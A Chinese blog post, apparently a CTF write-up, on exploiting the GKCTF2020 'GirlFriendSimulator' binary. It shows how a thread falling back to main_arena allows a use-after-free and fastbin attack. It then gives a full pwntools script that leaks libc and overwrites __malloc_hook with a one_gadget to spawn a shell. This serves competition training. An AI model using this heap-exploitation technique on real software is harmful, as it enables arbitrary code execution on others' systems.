线程PWN之gkctf2020 GirlFriendSimulator

最新推荐文章于 2024-03-23 15:51:05 发布
最新推荐文章于 2024-03-23 15:51:05 发布
阅读量1.2k 收藏 4
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 UAF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/107581574
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

线程PWN之gkctf2020 GirlFriendSimulator

首先,检查一下程序的保护机制

然后我们用IDA分析一下,一个多线程程序

在线程里的delete功能,存在UAF

但是由于add功能次数限制,无法在线程里完成这个UAF的利用

glibc中,线程有自己的arena,但是arena的个数是有限的,一般跟处理器核心个数有关,假如线程个数超过arena总个数,并且执行线程都在使用,那么该怎么办呢。Glibc会遍历所有的arena,首先是从主线程的main_arena开始,尝试lockarena,如果成功lock,那么就把这个arena给线程使用。

为了测试有多少个arena,我们写如下脚本

for i in range(num - 1):

   add(0x10,'a'*0x10)

   delete()

   add(0x10,'a'*0x8)

   show()

   sh.recvuntil('a'*0x8)

   heap_addr = u64(sh.recv(6).ljust(8,'\x00'))

   print 'heap_addr=',hex(heap_addr)

   nextThread()

我们看到,第9个,其堆地址跟main_arena管理的堆地址相似,可以推断出,该线程使用了main_arena。因此,我们在第9个线程里,利用delete功能制造UAF,然后,在main函数后面的流程中,

可以直接编辑最后一个线程创建的堆,也就是可以把fake_chunk链接到bin上,从而利用fastbin attack。

#coding:utf8
from pwn import *

#sh = process('./girlfriend_simulator')
sh = remote('node3.buuoj.cn',25877)
libc = ELF('./libc-2.23.so')
num = 9
sh.sendlineafter('How much girlfriend you want ?',str(num))

def add(size,content):
   sh.sendlineafter('>>','1')
   sh.sendlineafter('size?',str(size))
   sh.sendafter('content:',content)

def delete():
   sh.sendlineafter('>>','2')

def show():
   sh.sendlineafter('>>','3')

def nextThread():
   sh.sendlineafter('>>','5')

for i in range(num - 1):
   add(0x10,'a'*0x10)
   delete()
   add(0x10,'a'*0x8)
   show()
   sh.recvuntil('a'*0x8)
   heap_addr = u64(sh.recv(6).ljust(8,'\x00'))
   print 'heap_addr=',hex(heap_addr)
   nextThread()
#这个线程将使用主线程的main_arena,由此在主线程的堆里制造一个UAF
add(0x60,'a'*0x60)
delete()
nextThread()

sh.recvuntil('wife:0x')
libc_base = int(sh.recv(12),16) - libc.sym['_IO_2_1_stdout_']
malloc_hook_addr = libc_base + libc.sym['__malloc_hook']
one_gadget_addr = libc_base + 0x4526a
realloc_addr = libc_base + libc.sym['realloc']
print 'libc_base=',hex(libc_base)
print 'malloc_hook_addr=',hex(malloc_hook_addr)
print 'realloc_addr=',hex(realloc_addr)
print 'one_gadget_addr=',hex(one_gadget_addr)
sh.sendlineafter('say something to impress your girlfriend',p64(malloc_hook_addr - 0x23))
sh.sendlineafter('your girlfriend is moved by your words','I love you')
#改写malloc_hook
payload = '\x00'*0xB + p64(one_gadget_addr) + p64(realloc_addr + 0x2)
sh.sendlineafter('Questionnaire',payload)

sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BUUCTF]PWN——bjdctf_2020_YDSneedGrirlfriendUAF
mcmuyanga的博客
03-19 621
bjdctf_2020_YDSneedGrirlfriend 例行检查,64位程序,开启了canary和nx 试运行一下,看看大概的情况,常见的堆题的菜单 64位ida载入,首先是检索字符串发现了程序中的后门函数,backdoor=0x400b9c add_girlfriend() del_girlfriend() print_girlfriend() 常见的uaf漏洞的利用方法,不清楚的详细看ctfwiki show函数会调用chunk里的puts输出chunk里的name
BMZCTF-RE-Simulator
Henlenl的博客
04-27 188
BMZCTF-RE-Simulator工具的介绍关键代码get flag 发现程序有那么点陌生.obj文件,没见过。。。。。 查了一下资料发现,这是L3C,而且题目也给了Hint(Study 《Introduction to Computer System》 carefully,the format of flag is xmctf{}) 查了下这本书的资料,发现要下载 LC3Edit 用来编写LC3的软件 工具的介绍 关键代码 ps:程序中有几条指令要注意 BRZ 是跳转,类似汇编中的j…(z)
Pwn 学习
qq_41672971的博客
09-26 1319
windows pwn
2019CISCN华中赛区分区赛部分wp
一筐萝卜的博客
06-03 1412
pwn1 64位程序,只开启了NX(栈不可执行)保护,试着运行发现是一个菜单题,选项二、三没用 拖到IDA中查看,发现在encrypt选项中存在gets造成的栈溢出漏洞 不过输进去的字符串被分段异或了,我们可以先进性异或一下,然后在输入程序中,程序再异或一下就是我们想要的payload了 当时写脚本的时候发现流程劫持后,第二次发送payload的时候,payload没有被程序异或,直接打就可以...
pwn入门(3)堆
农夫果园好好喝的博客
07-22 633
是虚拟地址空间的一块连续的线性区域提供动态分配的内存,允许程序申请大小未知的内存在用户与操作系统之间,作为动态内存管理的中间人响应用户的申请内存请求,向操作系统申请内存,然后将其返回给用户程序管理用户所释放的内存,适时归还给操作系统。...
GKCTF2020.zip
07-20
GKCTF2020 逆向 pwn等赛题,除web题外均有
PWN 强网杯2020siri 题目
09-21
PWN 强网杯2020siri 题目
pwn2own2020:通过链接六个漏洞通过Safari破坏macOS内核
02-04
通过链接六个漏洞通过Safari破坏macOS内核 总览 该存储库包含利用和技术细节,并。 有关更多信息,您还可以查看。 该存储库还包括成功利用。 如何繁殖 ... ... 通过Safari使用攻击者服务器的IP访问网站: ...
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
一道pwn入门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
lightfactor-uaf
04-30
Lightfactor UAF身份验证库 lightfactor-uaf是库,为UAF操作提供注册,注销,身份验证和交易确认支持。 它旨在与提供HTTPS服务器到该库的lightfactor-engine结合使用。 Lightfactor身份引擎(lightfactor-uaf和lightfactor-engine的组合)参加了2016年8月的FIDO Interop活动,并于2016年9月FIDO的。它已针对免费AWS实例进行了负载测试,可同时支持200个实例该配置中的UAF操作。 该库的设计和构建着重于安装,依赖项,体系结构等方面的可伸缩性和简便性。此处以开放源代码形式提供该库,用于教育,推动FIDO的进一步采用和扩展FIDO生态系统。 不提供或暗含任何担保。 感谢对源代码的审查,并欢迎和鼓励做出贡献。 在查看我们。 特征 为了支持FIDO UAF操作,它提供以下功能: 在J
pwn学习笔记(6)--堆基础概述
最新发布
qq_66013948的博客
03-23 826
​ chunk 被释放时,glibc 会将它们重新组织起来,构成不同的 bin 链表,当用户再次申请时,就从中寻找合适的 chunk 返回用户。不同大小区间 chunk 被划分到不同的 bin 中,再加上一种特殊的 bin,一共有四种:Fast bin 、Samll bin 、 Large bin 、和 Unsorted bin。这些bin记录在 malloc_state 结构中。fastbinsY :这是一个 bin 数组,里面有 NFASTBINS 个 fast bin。
Kernel pwn 入门 (3)
CoLin的pwn小屋
07-08 1716
kernel pwn 入门之 ret2dir
2020-11-15 UNCTF部分pwn的wp
eeeeeight的博客
11-15 310
第一题:     直接用pwn里的recv( )就行了 do you like me:     直接覆盖到ip返回地址就好了 #!/usr/bin/env python # coding=utf-8 from pwn import * sh=remote('node2.hackingfor.fun',36806) #sh=process('./like') sh.recv() sh.sendline(p64(0)*3+p64(0
CTF-Pwn-[BJDCTF 2nd]ydsneedgirlfriend2
归子莫的博客
05-06 953
CTF-Pwn-[BJDCTF 2nd]ydsneedgirlfriend2 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]ydsneedgirlfriend2 下载...
【学习笔记】CTF PWN选手的养成(一)
prettyX的博客
11-20 2134
在ichunqiu上看的视频,对学习内容进行整理,对Atum老师表示感谢。 第一章 基础知识 0X01 PWN 简介 软件安全:软件安全专注于研究软件的设计和实现的安全 研究对象:代码(源码、字节码、汇编等) 研究目标:发掘漏洞、利用漏洞、修补漏洞 研究技术:逆向工程、漏洞挖掘与利用、漏洞防御技术 CTF PWN:软件安全研究的一个缩影 研究对象:可执行文件,主要是ELF文件 研究...
linux内核pwn,Linux Kernel Pwn 学习笔记 (UAF)
weixin_39747087的博客
04-29 314
原标题:Linux Kernel Pwn 学习笔记 (UAF) 本文为看雪论坛优秀文章看雪论坛作者ID:Vinadiak0x01 背景知识UAF漏洞UAF 漏洞是当我们 free 掉某个指针变量所指向的堆块的时候,未将该指针变量置0,导致该指针依然指着该堆块地址,当我们引用该指针的话,也就引用该指针所所指向的地址。这个漏洞对于开发者很容易忽略,但威力非常强大。条件竞争:在多线程的环境下,当多个线...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值